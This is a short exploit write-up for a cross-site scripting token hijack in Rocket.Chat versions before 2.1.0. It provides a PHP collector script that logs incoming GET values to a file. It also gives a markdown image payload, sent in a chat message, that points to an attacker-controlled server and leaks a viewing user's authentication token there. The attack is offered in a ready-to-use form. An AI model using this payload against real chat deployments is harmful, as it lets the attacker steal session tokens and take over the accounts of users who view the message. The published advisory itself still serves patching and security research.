Share
#[+] Title: Rocket.Chat - Cross Site Scripting Exploit (Token Hijack)  
#[+] Product: Rocket.Chat  
#[+] Vendor: https://rocket.chat/  
#[+] Vulnerable Version(s): Rocket.Chat < 2.1.0  
#  
#  
# Author : 3H34N  
# Ehsan Nezami  
# Website : nezami.me  
# Twitter : https://twitter.com/mr_ehsane  
# Special Thanks : Ali razmjoo, Mohammad Reza Espargham (@rezesp)  
  
  
1. Create l33t.php on a web server   
  
  
<?php  
$output = fopen("logs.txt", "a+") or die("WTF? o.O");  
$leet = $_GET['leet']."\n\n";  
fwrite($output, $leet);  
fclose($output);  
?>  
  
2. Open a chat session  
3. Send payload with your web server url  
  
  
![title](http://10.10.1.5/l33t.php?leet=+`{}token`)  
  
4. Token will be written in logs.txt when target seen your message.